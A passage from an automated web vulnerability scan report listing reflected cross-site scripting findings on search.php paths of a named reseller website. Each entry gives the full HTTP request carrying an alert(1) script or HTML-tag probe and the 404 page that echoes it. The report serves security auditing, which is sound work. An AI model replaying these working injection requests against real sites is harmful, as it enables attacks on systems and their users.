2.5462. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6b352<script>alert(1)</script>13480921d89 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/search.php6b352<script>alert(1)</script>13480921d89?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php6b352<script>alert(1)</script>13480921d89?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5463. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 15407<a>bfc3795945e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search15407<a>bfc3795945e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search15407<a>bfc3795945e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5464. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9d819<a>444f31d1e37 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...9d819<a>444f31d1e37&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...9d819<a>444f31d1e37&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5465. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 67871<script>alert(1)</script>96333653168 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67871<script>alert(1)</script>96333653168=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&67871<script>alert(1)</script>96333653168=1 was not found on this server.</p>
...[SNIP]...

2.5466. http://www.resellerbase.com/web-service/themes/kosmos/images/review/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/review/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c2b7c<a>fe97aadab31 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c2b7c<a>fe97aadab31 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2c2b7c<a>fe97aadab31 was not found on this server.</p>
...[SNIP]...

2.5467. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8fb95<script>alert(1)</script>657e7cfb9bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service8fb95<script>alert(1)</script>657e7cfb9bc/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service8fb95<script>alert(1)</script>657e7cfb9bc/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5468. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 975ea<script>alert(1)</script>6e368c1610e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes975ea<script>alert(1)</script>6e368c1610e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes975ea<script>alert(1)</script>6e368c1610e/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5469. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac6c0<script>alert(1)</script>018b1592d66 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmosac6c0<script>alert(1)</script>018b1592d66/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmosac6c0<script>alert(1)</script>018b1592d66/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5470. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3b4cc<script>alert(1)</script>af8f9a1f199 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images3b4cc<script>alert(1)</script>af8f9a1f199/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images3b4cc<script>alert(1)</script>af8f9a1f199/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5471. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cffc6<script>alert(1)</script>74b8c8a946a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/search.phpcffc6<script>alert(1)</script>74b8c8a946a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.phpcffc6<script>alert(1)</script>74b8c8a946a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5472. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e48e8<a>266597e451e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche48e8<a>266597e451e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche48e8<a>266597e451e&opt=2 was not found on this server.</p>
...[SNIP]...

2.5473. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload e5650<a>62dd299e4fd was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...e5650<a>62dd299e4fd&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...e5650<a>62dd299e4fd&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5474. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e6f6b<script>alert(1)</script>9ebc6e1f7eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6f6b<script>alert(1)</script>9ebc6e1f7eb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&e6f6b<script>alert(1)</script>9ebc6e1f7eb=1 was not found on this server.</p>
...[SNIP]...

2.5475. http://www.resellerbase.com/web-service/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3f97d<a>aefd10b45a1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=23f97d<a>aefd10b45a1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=23f97d<a>aefd10b45a1 was not found on this server.</p>
...[SNIP]...

2.5476. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f560f<script>alert(1)</script>fcba932cdd3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicef560f<script>alert(1)</script>fcba932cdd3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicef560f<script>alert(1)</script>fcba932cdd3/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5477. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5aa0a<script>alert(1)</script>a259ccd1c52 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes5aa0a<script>alert(1)</script>a259ccd1c52/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes5aa0a<script>alert(1)</script>a259ccd1c52/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5478. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bdd5<script>alert(1)</script>5b41faeff91 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos3bdd5<script>alert(1)</script>5b41faeff91/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/themes/kosmos3bdd5<script>alert(1)</script>5b41faeff91/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5479. http://www.resellerbase.com/web-service/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf141<script>alert(1)</script>f922cbd2239 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/themes/kosmos/search.phpbf141<script>alert(1)</script>f922cbd2239?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:52:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

